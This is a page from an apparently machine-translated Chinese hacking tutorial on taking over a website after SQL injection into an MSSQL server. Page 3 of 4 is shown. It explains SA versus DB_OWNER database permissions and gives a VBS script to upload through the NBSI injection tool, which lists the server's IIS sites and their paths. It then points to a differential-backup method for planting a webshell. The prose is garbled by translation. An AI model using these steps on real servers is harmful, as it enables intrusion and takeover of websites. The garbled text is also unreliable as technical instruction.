Home | hacker invade | crack analyzes | hacker course | Exploit | encryption decipher | network management | System crack | the virus to be related | invades the examination | firewall
You are here: hacking technology > hacker course > Content
Hot Articles
SmoothWall Introduces Lo
Travel of the JSP+Oracle
Hacker skill: Gains Webs
Breaks through the Inter
MYSQL database injection
The Tomcat backstage tak
Breaks through the Inter
The hacker teaches you a
WinHex pursues the code
How does the hacker dest
How teaches you to take
The SQL injection revise
mssql SA jurisdiction ne
Microsoft SQL Server SA
The bored Css cross stat
Recommend Articles
The SQL injection revise
How does the hacker dest
The new military recruit
Union inquires the small
MYSQL database injection
Invades under new skill
How does the website scr
Smells searches works as
How in does the net seep
Microsoft SQL Server SA
A simple invasion, does
The mainstream raises th
The bored Css cross stat
The random combined comm
The hacker teaches you a
New Articles
Check Point offers compa
The malware spreads Cali
Full Disk Encryption pro
Cardholders should take
U.S. still more spam tha
Strong encryption L?solu
ConvexSoft DJ Audio Mixe
Few companies k?can be i
IT professionals can kee
k the media?can not by s
k the media?can not by s
Google Custom Search Eng
Users of the iPhone and
Gateshead College offers
Manchester obtained pass
The new military recruits take WebShell the experience(3)
  Add date: 07/09/2008   Publishing date: 07/09/2008   Hits: 43
Total 4 pages, Current page:3, Jump to page:
 

  First we under the examination this MSSQL database's user jurisdiction, has 2 kinds generally first, one kind is SA (system admin) the jurisdiction, this jurisdiction is very big; Also one kind is the DB_OWNER jurisdiction, this jurisdiction bestows on for the user some to the database revision, the deletion, increases the data sheet, carries out the majority of memory process jurisdiction. But involves to some system sensitive operation jurisdiction does not have, this is also it and the SA jurisdiction only difference.

We first seek for the website on server's table of contents, may use D to examine the table of contents, seeks for the website the table of contents, individual experience is in D, E, the F plate's place.

  But how couldn't find sometimes to manage? So long as we uploaded the vbs document to be possible, the following document preservation was lookweb.vbs:

On Error Resume Next
If (LCase (Right (WScript.Fullname,11))= " wscript.exe ") Then
    Msgbox Space(12) & “IIS Virtual Web Viewer” & Space(12) & Chr(13) & Space(9) &” Usage:Cscript vWeb.vbs ", 4096, “Lilo”
    WScript.Quit
End If
Set ObjService=GetObject (“IIS://LocalHost/W3SVC”)
For Each obj3w In objservice
    If IsNumeric (obj3w. Name) Then
          Set OService=GetObject (“IIS://LocalHost/W3SVC/” & obj3w. Name)
          Set VDirObj = OService.GetObject (“IIsWebVirtualDir”, “ROOT”)
          If Err <> 0 Then WScript.Quit (1)
          WScript.Echo Chr(10) & “[” & OService.ServerComment & “]”
          For Each Binds In OService.ServerBindings
                Web = “{” & Replace (Binds, “: ”, “} {”) & “}”
                WScript.Echo Replace (Split (Replace (Web, ““, ""),”} {“) (2),”} “, "")
          Next
          WScript.Echo “Path        : “& VDirObj.Path
    End If
Next


  Then uses NBSI to upload to the server on, then carries out the cscript X:\lookweb.vbs, in returns to obviously in the information us to be possible to see on this server the corresponding website and its corresponding website table of contents, is very convenient. The website table of contents is clear.

  Has found the website table of contents, we may use the differential backup to gain webshell

 

Other pages: : <<Prev * 1 * 2 * 3 * 4 * Next>>
Prev:The SQL injection revises difficultly to guess the solution MD5 Next:Union inquires the small skill

Comment:

Category: Home > hacker course
Home